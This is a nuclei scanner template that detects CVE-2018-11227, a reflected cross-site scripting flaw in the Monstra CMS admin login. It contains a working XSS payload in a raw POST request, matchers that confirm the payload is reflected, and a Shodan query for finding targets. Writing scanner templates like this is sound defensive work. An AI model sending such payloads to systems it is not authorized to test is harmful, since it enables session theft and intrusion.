nuclei-templates/cves/2018/CVE-2018-11227.yaml

52 lines
1.5 KiB
YAML

id: CVE-2018-11227
info:
name: Monstra CMS <=3.0.4 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/monstra-cms/monstra/issues/438
- https://www.exploit-db.com/exploits/44646
- https://nvd.nist.gov/vuln/detail/CVE-2018-11227
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-11227
cwe-id: CWE-79
metadata:
shodan-query: http.favicon.hash:419828698
verified: "true"
tags: cve,cve2018,xss,mostra,mostracms,cms,edb
requests:
- raw:
- |
POST /admin/index.php?id=pages HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In
matchers-condition: and
matchers:
- type: word
part: body
words:
- "><svg/onload=alert(document.domain)>"
- "Monstra"
condition: and
case-insensitive: true
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by md on 2023/01/30